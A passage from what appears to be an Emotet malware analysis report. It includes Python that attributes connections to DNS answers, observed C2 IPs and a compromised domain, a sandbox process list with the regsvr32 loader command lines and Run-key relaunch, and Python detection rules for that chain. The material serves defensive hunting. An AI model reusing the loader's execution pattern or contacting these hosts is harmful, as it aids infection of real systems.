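    ("05:43:55.004674", "115.178.55.22", 80),
    ("05:44:10.140861", "218.38.121.17", 443),
]


def to_seconds(ts: str) -> float:
    """'HH:MM:SS.frac' -> seconds since midnight; accepts the 9-digit fractions used above."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def cname_reverse_map(answers: List[Answer]) -> Dict[str, str]:
    """Alias target -> the name that was queried to reach it."""
    return {cname: name for _, name, cname, _, rtype in answers if rtype == "CNAME" and cname}


def queried_name(name: str, cname_rev: Dict[str, str]) -> str:
    """Walk a CNAME chain backwards to the hostname the client actually asked for."""
    seen = {name}
    while name in cname_rev and cname_rev[name] not in seen:  # seen guards against loops
        name = cname_rev[name]
        seen.add(name)
    return name


def attribute_connections(answers: List[Answer], conns: List[Conn]) -> Dict[str, Optional[str]]:
    """Map 'ip:port' -> queried hostname whose A answer preceded the connection.

    None means the destination was never resolved in the capture, which is what a
    hard-coded C2 address list looks like on the wire.
    """
    cname_rev = cname_reverse_map(answers)
    a_records = [(to_seconds(ts), addr, queried_name(name, cname_rev))
                 for ts, name, _, addr, rtype in answers if rtype == "A" and addr]
    result: Dict[str, Optional[str]] = {}
    for ts, ip, port in conns:
        t = to_seconds(ts)
        prior = [q for at, addr, q in a_records if addr == ip and at <= t]
        result[f"{ip}:{port}"] = prior[-1] if prior else None
    return result


def resolved_but_not_contacted(answers: List[Answer], conns: List[Conn]) -> Set[str]:
    """Queried hostnames whose resolved address never appears as a connection target."""
    cname_rev = cname_reverse_map(answers)
    contacted = {ip for _, ip, _ in conns}
    return {queried_name(name, cname_rev)
            for _, name, _, addr, rtype in answers
            if rtype == "A" and addr and addr not in contacted}


if __name__ == "__main__":
    for dest, host in attribute_connections(DNS_ANSWERS, CONNECTIONS).items():
        print(f"{dest:<20} {host or 'no prior DNS answer (literal address)'}")
    print("resolved but never contacted:", sorted(resolved_but_not_contacted(DNS_ANSWERS, CONNECTIONS)))
```

Attributing by the queried name rather than the CNAME target matters for blocking and hunting: the address 187.1.136.16 belongs to web15f04.uni5.net, a shared host, but the indicator the sample carried is www.clinicaportalpsicologia.com.br.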

                                    Target ID:0
                                    Start time:05:43:09
                                    Start date:16/11/2022
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x13f250000
                                    File size:28253536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:4
                                    Start time:05:43:21
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.920122880.0000000002011000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.920051864.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:6
                                    Start time:05:43:24
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1193389765.0000000000211000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1193348564.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000006.00000002.1193452350.00000000002FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:7
                                    Start time:05:43:25
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:8
                                    Start time:05:43:26
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:9
                                    Start time:05:43:27
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:11
                                    Start time:05:44:34
                                    Start date:16/11/2022
                                    Path:C:\Windows\System32\regsvr32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll
                                    Imagebase:0xffa20000
                                    File size:19456 bytes
                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000B.00000002.1193361768.00000000001EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.1193544536.0000000002031000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.1193467860.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
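The process list shows the loader chain in full: Excel launches regsvr32.exe with /S against relative paths (..\elv1.ooocccxxx through ..\elv4.ooocccxxx) whose extension is not .dll, the loaded module copies itself to a randomly named directory under C:\Windows\system32\ and re-registers from there, and the last entry (target 11) is the Run-key relaunch, recorded with the misplaced quotes the key value carries. The Python below is an added example, not part of the report: it runs four detection rules over process-creation events shaped like Sysmon Event ID 1 (Image, ParentImage, CommandLine). The events are constructed from the process entries above with assumed parent relationships (the report does not print a parent column), and the allow-list of System32 subdirectories is an assumption to tune per environment.

```python
import ntpath
import re
from typing import Dict, List, Optional, Tuple

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "msaccess.exe", "outlook.exe"}
REGSVR32_MODULE_EXTS = {".dll", ".ocx", ".ax"}
# Assumption for this example: directories that legitimately hold DLLs one level below
# System32 or SysWOW64. Anything else (e.g. FgEHLIiiJRN) is treated as suspicious.
SYSTEM32_SUBDIR_ALLOW = {"drivers", "wbem", "spool", "driverstore", "winevt"}
SYSTEM32_SUBDIR_DLL = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\([^\\]+)\\[^\\]+\.dll$", re.I)
ABSOLUTE_PATH = re.compile(r"^([a-z]:\\|\\\\)", re.I)
# Quoted run or bare run; tolerates the unbalanced quotes of the Run-key command line.
TOKEN = re.compile(r'"[^"]*"|\S+')

# Constructed events modelled on the report's process entries (parents are assumed).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"UtcTime": "2022-11-16 05:43:21", "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": r"C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx"},
    {"UtcTime": "2022-11-16 05:43:24", "ParentImage": r"C:\Windows\System32\regsvr32.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"'},
    {"UtcTime": "2022-11-16 05:43:25", "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": r"C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx"},
    # Constructed benign control: an installer registering a COM DLL from its own directory.
    {"UtcTime": "2022-11-16 05:40:00", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
    {"UtcTime": "2022-11-16 05:44:34", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll'},
]


def tokenize(cmd: str) -> List[str]:
    return [t.strip('"') for t in TOKEN.findall(cmd)]


def regsvr32_module(cmd: str) -> Optional[str]:
    """First argument that is not a /switch: the module regsvr32 will load."""
    for tok in tokenize(cmd)[1:]:
        if not tok.startswith(("/", "-")):
            return tok
    return None


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules that fire for one process-creation event."""
    if ntpath.basename(event["Image"]).lower() != "regsvr32.exe":
        return []
    hits: List[str] = []
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent in OFFICE_APPS:
        hits.append("office_spawns_regsvr32")
    module = regsvr32_module(event["CommandLine"])
    if module:
        if ntpath.splitext(module)[1].lower() not in REGSVR32_MODULE_EXTS:
            hits.append("regsvr32_non_dll_extension")
        if module.startswith((".\\", "..\\")) or not ABSOLUTE_PATH.match(module):
            hits.append("regsvr32_relative_module_path")
        m = SYSTEM32_SUBDIR_DLL.match(module)
        if m and m.group(2).lower() not in SYSTEM32_SUBDIR_ALLOW:
            hits.append("regsvr32_dll_in_system32_subdir")
    return hits


def run_rules(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """(UtcTime, fired rules) for every event that triggered at least one rule."""
    return [(e["UtcTime"], hits) for e in events if (hits := evaluate(e))]


if __name__ == "__main__":
    for when, rules in run_rules(SAMPLE_EVENTS):
        print(when, ", ".join(rules))
```

The relative-path rule is the one worth keeping even when the extension trick changes: regsvr32 resolving ..\something against Excel's working directory is how the loader reaches the DLL it just dropped in the user profile root, and legitimate installers pass absolute paths.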

                                    No disassembly